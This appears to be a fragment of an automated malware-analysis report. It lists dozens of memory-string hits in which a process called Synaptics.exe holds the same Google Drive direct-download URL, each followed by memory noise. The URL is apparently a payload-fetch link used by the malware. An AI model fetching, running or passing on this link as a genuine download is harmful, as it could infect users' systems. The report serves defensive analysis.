                            Source: Synaptics.exe, 0000001D.00000002.2989870916.0000000007072000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E64D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2989870916.00000000070B7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3015474774.000000000E5B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadme
                            Source: Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmple
                            Source: Synaptics.exe, 00000005.00000002.2039578728.000000000076F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmr
                            Source: Synaptics.exe, 0000001D.00000002.3009536844.000000000E3D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmt
                            Source: Synaptics.exe, 00000005.00000002.2048249910.00000000053FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmy:
                            Source: Synaptics.exe, 00000005.00000002.2048249910.000000000547D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2051658236.0000000006F52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2039578728.000000000076F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2953691114.000000000089F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3009536844.000000000E3D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.0000000007192000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E67A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3012002014.000000000E4A3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E64D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn
                            Source: Synaptics.exe, 0000001D.00000002.3052445187.000000001D732000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn$
                            Source: Synaptics.exe, 0000001D.00000002.2975599142.0000000004E05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn.
                            Source: Synaptics.exe, 0000001D.00000002.2953691114.0000000000946000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn.V
                            Source: Synaptics.exe, 0000001D.00000002.2993567554.00000000071D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn.com4l
                            Source: Synaptics.exe, 00000005.00000002.2048249910.00000000053FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn=N
                            Source: Synaptics.exe, 0000001D.00000002.2975599142.0000000004E05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnab
                            Source: Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E64D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadncell
                            Source: Synaptics.exe, 0000001D.00000002.3006968919.000000000E2B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadncr
                            Source: Synaptics.exe, 0000001D.00000002.3006968919.000000000E2B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadne
                            Source: Synaptics.exe, 0000001D.00000002.3009536844.000000000E3D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadne.c
                            Source: Synaptics.exe, 0000001D.00000002.2989870916.0000000007072000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2989870916.00000000070B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnes
                            Source: Synaptics.exe, 0000001D.00000002.2975599142.0000000004D80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnet
                            Source: Synaptics.exe, 0000001D.00000002.3006968919.000000000E2B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnetleniyor...
                            Source: Synaptics.exe, 0000001D.00000002.3055866183.000000001D83E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadniyor...
                            Source: Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadns
                            Source: Synaptics.exe, 00000005.00000002.2051658236.0000000006FA4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3052445187.000000001D732000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2989870916.0000000007072000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3012002014.000000000E4A3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2975599142.0000000004DB8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2989870916.00000000070B7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2989870916.0000000007102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado
                            Source: Synaptics.exe, 0000001D.00000002.2975599142.0000000004E05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado1
                            Source: Synaptics.exe, 00000005.00000002.2048249910.000000000547D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoQl
                            Source: Synaptics.exe, 0000001D.00000002.2953691114.0000000000946000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2975599142.0000000004E05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadog
                            Source: Synaptics.exe, 0000001D.00000002.2953691114.0000000000946000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadogZ
                            Source: Synaptics.exe, 0000001D.00000002.2975599142.0000000004E05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadogle.
                            Source: Synaptics.exe, 0000001D.00000002.2975599142.0000000004E05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadogleQ
                            Source: Synaptics.exe, 0000001D.00000002.3009536844.000000000E3D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoi
                            Source: Synaptics.exe, 00000005.00000002.2039578728.000000000076F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadom$
                            Source: Synaptics.exe, 0000001D.00000002.2953691114.000000000089F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadomput0
                            Source: Synaptics.exe, 0000001D.00000002.2989870916.0000000007072000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2989870916.00000000070B7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3015474774.000000000E5B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadones
                            Source: Synaptics.exe, 0000001D.00000002.2953691114.0000000000946000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoo
                            Source: Synaptics.exe, 0000001D.00000002.3006968919.000000000E2B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoo:
                            Source: Synaptics.exe, 0000001D.00000002.3006968919.000000000E2B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoob
                            Source: Synaptics.exe, 0000001D.00000002.2993567554.00000000071D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2989870916.0000000007102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoogle
                            Source: Synaptics.exe, 0000001D.00000002.3006968919.000000000E2B0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3050224250.000000001D6E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadop
                            Source: Synaptics.exe, 0000001D.00000002.3006968919.000000000E2B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloador
                            Source: Synaptics.exe, 0000001D.00000002.3006968919.000000000E2B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloador6
                            Source: Synaptics.exe, 0000001D.00000002.2975599142.0000000004D80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoss-O
                            Source: Synaptics.exe, 0000001D.00000002.2953691114.0000000000946000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadou
                            Source: Synaptics.exe, 00000005.00000002.2048249910.000000000547D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2051658236.0000000006F52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3009536844.000000000E3D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E67A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3043540520.000000001B33E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2989870916.0000000007072000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3052445187.000000001D752000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3012002014.000000000E4A3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2975599142.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2975599142.0000000004DB8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3008225961.000000000E30B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3057921806.000000001D895000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp
                            Source: Synaptics.exe, 00000005.00000002.2048249910.00000000053FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp=t
                            Source: Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpc
                            Source: Synaptics.exe, 0000001D.00000002.2975599142.0000000004E05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpi
                            Source: Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpl
                            Source: Synaptics.exe, 0000001D.00000002.2975599142.0000000004E05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadppV
                            Source: Synaptics.exe, 0000001D.00000002.2953691114.0000000000946000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadps2
                            Source: Synaptics.exe, 00000005.00000002.2048249910.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.000000000721B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadq
                            Source: Synaptics.exe, 0000001D.00000002.2975599142.0000000004D80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadquir
                            Source: Synaptics.exe, 00000005.00000002.2051658236.0000000006F52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.0000000007192000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3012002014.000000000E4A3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2975599142.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.00000000071D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.000000000721B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2989870916.00000000070B7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3050224250.000000001D6E4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2989870916.0000000007102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3015474774.000000000E5B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr
                            Source: Synaptics.exe, 0000001D.00000002.3006968919.000000000E2B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr.
                            Source: Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E64D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr...
                            Source: Synaptics.exe, 00000005.00000002.2039578728.000000000076F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrcx
                            Source: Synaptics.exe, 0000001D.00000002.2953691114.0000000000946000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadre
                            Source: Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrepor
                            Source: Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadri
                            Source: Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrigin
                            Source: Synaptics.exe, 0000001D.00000002.3009536844.000000000E3D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrojec
                            Source: Synaptics.exe, 0000001D.00000002.2975599142.0000000004E05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrsr
                            Source: Synaptics.exe, 0000001D.00000002.2975599142.0000000004E05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrv&
                            Source: Synaptics.exe, 00000005.00000002.2048249910.00000000053FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrx%#
                            Source: Synaptics.exe, 00000005.00000002.2048249910.00000000054CD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2048249910.00000000053FA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2953691114.000000000089F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E67A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2989870916.0000000007072000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3055866183.000000001D7F8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E64D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2989870916.00000000070B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads
                            Source: Synaptics.exe, 00000005.00000002.2039578728.000000000076F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads.
                            Source: Synaptics.exe, 0000001D.00000002.2993567554.0000000007192000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsOGlE
                            Source: Synaptics.exe, 0000001D.00000002.2975599142.0000000004DB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsOGlEJ
                            Source: Synaptics.exe, 00000005.00000002.2048249910.000000000547D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsQ
                            Source: Synaptics.exe, 0000001D.00000002.2953691114.0000000000946000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadse
                            Source: Synaptics.exe, 0000001D.00000002.2993567554.0000000007192000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadser-A
                            Source: Synaptics.exe, 0000001D.00000002.3009536844.000000000E3D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadserviA
                            Source: Synaptics.exe, 0000001D.00000002.2975599142.0000000004D80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsion
                            Source: Synaptics.exe, 0000001D.00000002.2993567554.00000000071D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsq
                            Source: Synaptics.exe, 00000005.00000002.2048249910.00000000054CD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3009536844.000000000E3D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.0000000007192000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E67A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3052445187.000000001D752000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2975599142.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.00000000071D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.000000000721B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2989870916.0000000007102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3057921806.000000001D895000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3015474774.000000000E5B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt
                            Source: Synaptics.exe, 0000001D.00000002.2975599142.0000000004D80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt-rev
                            Source: Synaptics.exe, 0000001D.00000002.2975599142.0000000004E05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt.2
                            Source: Synaptics.exe, 0000001D.00000002.2953691114.0000000000946000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt1
                            Source: Synaptics.exe, 00000005.00000002.2048249910.000000000547D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtHZ
                            Source: Synaptics.exe, 0000001D.00000002.2953691114.0000000000946000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtd
                            Source: Synaptics.exe, 0000001D.00000002.2975599142.0000000004E05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtd0
                            Source: Synaptics.exe, 0000001D.00000002.2975599142.0000000004DB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtfor
                            Source: Synaptics.exe, 0000001D.00000002.2989870916.0000000007072000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2989870916.00000000070B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtlen
                            Source: Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E64D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtleni
                            Source: Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtm
                            Source: Synaptics.exe, 0000001D.00000002.2989870916.0000000007072000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadto
                            Source: Synaptics.exe, 0000001D.00000002.3009536844.000000000E3D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtp)
                            Source: Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtrust
                            Source: Synaptics.exe, 0000001D.00000002.2953691114.0000000000946000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadts
                            Source: Synaptics.exe, 00000005.00000002.2048249910.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3009536844.000000000E3D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2953691114.00000000008DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadu
                            Source: Synaptics.exe, 0000001D.00000002.3052445187.000000001D732000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadu&
                            Source: Synaptics.exe, 0000001D.00000002.2993567554.0000000007192000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaduZVk&
                            Source: Synaptics.exe, 0000001D.00000002.3006968919.000000000E2B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadun
                            Source: Synaptics.exe, 0000001D.00000002.3009536844.000000000E3D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadurce.
                            Source: Synaptics.exe, 0000001D.00000002.2953691114.000000000089F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadurity
                            Source: Synaptics.exe, 00000005.00000002.2039578728.000000000076F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadut
                            Source: Synaptics.exe, 0000001D.00000002.3009536844.000000000E3D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadutube
                            Source: Synaptics.exe, 0000001D.00000002.3009536844.000000000E3D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaduw
